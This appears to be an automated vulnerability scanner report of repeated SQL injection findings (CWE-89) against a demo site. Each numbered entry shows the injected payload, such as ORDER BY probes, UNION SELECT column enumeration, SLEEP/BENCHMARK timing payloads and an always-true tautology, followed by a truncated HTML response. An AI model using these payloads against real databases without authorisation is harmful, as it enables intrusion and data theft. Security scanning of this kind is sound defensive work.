[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1816\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1817\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),\"'\n3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1818Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1819\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1820\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1821\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"x\"=\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1822\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1823\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1824\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1825\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1826Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1827\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1828\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1829\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1830\nScan SQL Injection\nSeverity ERROR\nEndpoint 